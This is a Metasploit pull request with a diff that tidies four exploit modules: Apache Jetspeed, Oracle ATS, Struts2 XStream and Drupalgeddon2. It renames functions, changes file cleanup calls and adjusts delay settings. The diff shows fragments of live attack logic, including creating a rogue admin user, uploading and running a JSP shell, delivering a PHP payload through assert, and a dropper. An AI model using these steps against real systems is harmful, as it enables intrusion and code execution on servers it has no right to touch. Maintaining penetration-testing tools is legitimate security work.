### PR TITLE
Errata for a few of my modules

### DIFF
--- a/modules/exploits/multi/http/apache_jetspeed_file_upload.rb
+++ b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb
@@ -62,10 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status("Creating admin user: #{username}:#{password}")
     create_admin_user
-    # This was originally a typo... but we're having so much fun!
-    print_status('Kenny Loggins in')
-    kenny_loggins
-    print_warning('You have entered the Danger Zone')
+    print_status('Logging in as newly created admin')
+    jetspeed_login
     print_status("Uploading payload ZIP: #{zip_filename}")
     upload_payload_zip
     print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")
@@ -102,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def kenny_loggins
+  def jetspeed_login
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => '/jetspeed/login/redirector'
@@ -154,11 +152,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target['Platform']
     when 'linux'
-      register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
-      register_files_for_cleanup("../temp/#{username}/#{zip_filename}")
+      register_file_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
+      register_dir_for_cleanup("../temp/#{username}")
     when 'win'
-      register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
-      register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}")
+      register_file_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
+      register_dir_for_cleanup("..\\temp\\#{username}")
     end
 
     send_request_cgi(
@@ -187,19 +185,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'DELETE',
       'uri'    => "/jetspeed/services/usermanager/users/#{username}"
     )
-  end
-
-  # XXX: This is a hack because FileDropper doesn't delete directories
-  def on_new_session(session)
-    super
-    case target['Platform']
-    when 'linux'
-      print_status("Deleting user temp directory: ../temp/#{username}")
-      session.shell_command_token("rm -rf ../temp/#{username}")
-    when 'win'
-      print_status("Deleting user temp directory: ..\\temp\\#{username}")
-      session.shell_command_token("rd /s /q ..\\temp\\#{username}")
-    end
   end
 
   #

--- a/modules/exploits/multi/http/oracle_ats_file_upload.rb
+++ b/modules/exploits/multi/http/oracle_ats_file_upload.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"')
     mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"')
 
-    register_files_for_cleanup(jsp_path)
+    register_file_for_cleanup(jsp_path)
 
     send_request_cgi(
       'method' => 'POST',

--- a/modules/exploits/multi/http/struts2_rest_xstream.rb
+++ b/modules/exploits/multi/http/struts2_rest_xstream.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    return CheckCode::Appears if execute_command(random_crap)
+    return CheckCode::Appears if execute_command(rand_str)
 
     CheckCode::Safe
   end
@@ -151,9 +151,9 @@ class MetasploitModule < Msf::Exploit::Remote
                       <name>start</name>
                       <parameter-types/>
                     </method>
-                    <name>#{random_crap}</name>
+                    <name>#{rand_str}</name>
                   </filter>
-                  <next class="string">#{random_crap}</next>
+                  <next class="string">#{rand_str}</next>
                 </serviceIterator>
                 <lock/>
               </cipher>
@@ -189,7 +189,7 @@ EOF
     'java.lang.String cannot be cast to java.security.Provider$Service'
   end
 
-  def random_crap
+  def rand_str
     Rex::Text.rand_text_alphanumeric(8..42)
   end
 

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('PHP_FUNC',  [true, 'PHP function to execute', 'passthru']),
-      OptBool.new('DUMP_OUTPUT', [false, 'Dump HTTP response body', false])
+      OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])
     ])
 
     register_advanced_options([

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ]
       ],
       'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
-      'DefaultOptions' => {'WfsDelay' => 2},
+      'DefaultOptions' => {'WfsDelay' => 2}, # Wait between and after attempts
       'Notes'          => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}
     ))
 

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ]
       ],
       'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
-      'DefaultOptions' => {'WfsDelay' => 10},
+      'DefaultOptions' => {'WfsDelay' => 2},
       'Notes'          => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}
     ))
 
@@ -192,7 +192,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :php_memory
       execute_command(payload.encoded, func: 'assert')
 
-      sleep(2)
+      sleep(wfs_delay)
       return if session_created?
 
       # XXX: This will spawn a *very* obvious process
@@ -202,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :php_dropper, :linux_dropper
       dropper_assert
 
-      sleep(2)
+      sleep(wfs_delay)
       return if session_created?
 
       dropper_exec
@@ -269,13 +269,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'    => normalize_uri(target_uri.path, php_file)
     )
 
-    sleep(2)
+    sleep(wfs_delay)
     return if session_created?
 
     # Try to get a shell with PHP CLI
     execute_command("php #{php_file}")
 
-    sleep(2)
+    sleep(wfs_delay)
     return if session_created?
 
     register_file_for_cleanup(tmp_file)

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -122,13 +122,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ]
       ],
       'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
-      'DefaultOptions' => {'WfsDelay' => 2},
       'Notes'          => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}
     ))
 
     register_options([
       OptString.new('PHP_FUNC',  [true, 'PHP function to execute', 'passthru']),
-      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
+      OptBool.new('DUMP_OUTPUT', [false, 'Dump HTTP response body', false])
     ])
 
     register_advanced_options([
@@ -161,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error('Could not determine Drupal patch level')
     end
 
-    token = random_crap
+    token = rand_str
     res   = execute_command(token, func: 'printf')
 
     if res && res.body.start_with?(token)
@@ -192,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :php_memory
       execute_command(payload.encoded, func: 'assert')
 
-      sleep(wfs_delay)
+      sleep(2)
       return if session_created?
 
       # XXX: This will spawn a *very* obvious process
@@ -202,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :php_dropper, :linux_dropper
       dropper_assert
 
-      sleep(wfs_delay)
+      sleep(2)
       return if session_created?
 
       dropper_exec
@@ -211,7 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def dropper_assert
     php_file = Pathname.new(
-      "#{datastore['WritableDir']}/#{random_crap}.php"
+      "#{datastore['WritableDir']}/#{rand_str}.php"
     ).cleanpath
 
     # Return the PHP payload or a PHP binary dropper
@@ -242,7 +241,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def dropper_exec
-    php_file = "#{random_crap}.php"
+    php_file = "#{rand_str}.php"
     tmp_file = Pathname.new(
       "#{datastore['WritableDir']}/#{php_file}"
     ).cleanpath
@@ -269,13 +268,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'    => normalize_uri(target_uri.path, php_file)
     )
 
-    sleep(wfs_delay)
+    sleep(2)
     return if session_created?
 
     # Try to get a shell with PHP CLI
     execute_command("php #{php_file}")
 
-    sleep(wfs_delay)
+    sleep(2)
     return if session_created?
 
     register_file_for_cleanup(tmp_file)
@@ -380,7 +379,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def random_crap
+  def rand_str
     Rex::Text.rand_text_alphanumeric(8..42)
   end
 

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -122,6 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ]
       ],
       'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
+      'DefaultOptions' => {'WfsDelay' => 10},
       'Notes'          => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}
     ))
 


### PR DESCRIPTION
In an effort to mitigate copypasta errors, I periodically go back and correct things in old modules I've written.

- [x] Verify `exploit/unix/webapp/drupal_drupalgeddon2`
- [x] Verify `exploit/multi/http/struts2_rest_xstream`
- [x] Verify `exploit/multi/http/apache_jetspeed_file_upload`
- [x] Verify `exploit/multi/http/oracle_ats_file_upload`

#11481